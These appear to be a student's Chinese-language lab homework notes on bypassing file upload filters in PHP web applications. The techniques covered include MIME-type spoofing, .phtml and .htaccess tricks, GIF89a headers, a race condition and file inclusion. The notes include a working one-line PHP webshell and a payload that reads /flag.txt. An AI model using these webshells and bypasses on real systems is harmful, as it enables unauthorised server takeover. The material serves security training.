班级作业笔记报告0x02

作业1:

类型绕过

打开Terminal

复制代码
#创建webshell

echo '<?php system($_GET['test']);?>' > test.php

访问首页抓包

删掉响应包的javascript脚本代码,然后Forward,回到首页抓包上传test.php文件

修改Content-Type: application/octet-stream,改为Content-Type: image/gif

输入id测试,成功输出命令值,成功getshell

作业2:

黑名单绕过

依旧作业一操作创建webshell文件,直接上传.php文件上传失败了,换.phtml成功

作业3:

内容校验

#创建Apache配置文件.htaccess

echo 'AddType application/x-httpd-php' > .htaccess

上传的时候改下文件MIME类型,必须是image/jpeg才允许上传

然后将上传请求包发送到Repeater模块做备份,写代码拿flag

写入test.jpg文件,MIME类型依旧image/jpeg

复制代码
<script language='php'>echo file_get_contents('/flag.txt')</script>

作业完成

作业4:

条件竞争

#可getshell

依旧Terminal操作,这次写入phpinfo

上传代码文件<?php phpinfo();?>

发送爆破模块

访问文件名,路径为upload/test.php

发送爆破模块

两个同时爆破,运气好刚开始就可以结束了

作业5:

文件上传与文件包含

依旧Terminal操作

首页访问一片空白,burpsuite抓包拦截响应包内容,将前端注释符号删掉

上传文件抓包,修改

文件后缀为.gif文件

MIME类型image/gif

文件头GIF89a

访问index.php文件

GET传参?hello=uploads/test.gif

完成作业

个人评价

唠嗑

相比SQL注入漏洞,本次作业的文件上传漏洞相对简单,SQL注入漏洞涉及数据库知识,而文件上传漏洞涉及的知识不多,HTTP/S协议、一点点PHP一句话木马、JavaScript拓展PHP代码、文件包含漏洞知识、文件解析后缀拓展、Apache配置文件解析绕过。

相关推荐
Hello_Embed2 小时前
LVGL 入门(一):环境搭建与源码获取
笔记·stm32·单片机·嵌入式·lvgl
2501_926978334 小时前
AI在精神世界的意义--对存在模式的重新解构
经验分享·笔记·ai写作
爱倒腾的老唐4 小时前
1、万用表
笔记
中屹指纹浏览器5 小时前
2026多账号安全运营:指纹浏览器选型、部署与平台风控应对指南
经验分享·笔记
高梦轩6 小时前
LNMP 环境部署笔记
linux·笔记
角砾岩队长6 小时前
CASS常用快捷指令
经验分享·笔记
云边散步6 小时前
godot2D游戏教程系列二(14)
笔记·学习·游戏·游戏开发
崔高杰7 小时前
训练数据选择又有新方法了?——两篇文章的阅读笔记 Less is Enough和 OPUS
人工智能·笔记·机器学习
爱吃奶酪的松鼠丶7 小时前
LangGraph 实战笔记:用 AI 发起流程应用
人工智能·笔记